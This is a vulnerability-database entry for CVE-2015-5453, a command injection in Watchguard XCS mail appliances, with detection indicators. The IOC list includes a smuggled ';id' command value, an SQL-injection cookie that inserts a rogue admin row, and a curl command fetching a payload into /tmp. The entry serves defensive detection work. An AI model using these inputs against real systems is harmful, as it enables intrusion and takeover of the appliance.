CVE-2015-5453
published 2015-07-08

Priority: P2 (62) · Severity: medium · CVSS 2.0 base score: 6.5
CVSS 2.0 vector: AV:N/AC:L/Au:S/C:P/I:P/A:P
Exploit: available
EPSS: 57.31% (99.0th percentile)
Watchguard XCS 9.2 and 10.0 before build 150522 allow remote authenticated users to execute arbitrary commands via shell metacharacters in the id parameter to ADMIN/mailqueue.spl.

Affected (2 ranges)

Vendor | Product | Version range | Fixed in
watchguard | xcs | 9.2, before build 150522 | build 150522
watchguard | xcs | 10.0, before build 150522 | build 150522

Detection & IOCs (extracted from sources)

url: /ADMIN/mailqueue.spl
url: /borderpost/imp/compose.php3
url: /login.spl
cookie: sid=1'
cookie: sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(...)
command: /usr/local/sbin/curl -k <payload_uri> -o /tmp/<filename>
command: ;id
other: uid=65534
other: unterminated quoted string
port: 443
  • Detect SQLi exploitation attempt via the session cookie: look for HTTP requests to /borderpost/imp/compose.php3 where the 'sid' cookie contains SQL metacharacters (e.g., single quote or URL-encoded semicolon followed by INSERT statements targeting sds_users table).
  • Detect OS command injection via GET requests to /ADMIN/mailqueue.spl where the 'id' parameter begins with a semicolon (shell metacharacter), e.g., ?f=dnld&id=;<command>.
  • Successful exploitation results in command execution as uid=65534 (nobody). Monitor web server logs for responses containing 'uid=65534' from /ADMIN/mailqueue.spl.
  • Vulnerability check probe: HTTP request to /borderpost/imp/compose.php3 with cookie sid=1' (single quote). A response body containing 'unterminated quoted string' confirms the SQLi is present.
  • Post-exploitation payload delivery: watch for outbound curl requests from the appliance to attacker-controlled URLs, followed by execution of randomly named binaries dropped in /tmp/.
  • The exploit targets Watchguard XCS 9.2 and 10.0 before build 150522 over HTTPS (port 443). Scope detection rules to these versions and this port.
  • The exploit chain combines two vulnerabilities: an unauthenticated SQL injection (to add a rogue admin user) and an authenticated OS command injection. Detection must cover both stages independently, as an attacker with pre-existing valid credentials can skip the SQLi stage and go directly to command injection.
  • The backdoor username and password default to 'backdoor'/'backdoor' in the Metasploit module but are configurable; do not rely solely on credential-based detection for the added rogue account.
  • The password hash uses a device-specific salting scheme (BorderWare prefix + suffix salts + double MD5). Detection of newly inserted sds_users rows or login attempts with this hash pattern may be more reliable than password value matching.
  • The dropped payload filename is randomly generated (8 lowercase alpha characters) under /tmp/, making static filename-based detection unreliable; use behavioral detection for execution of binaries from /tmp/.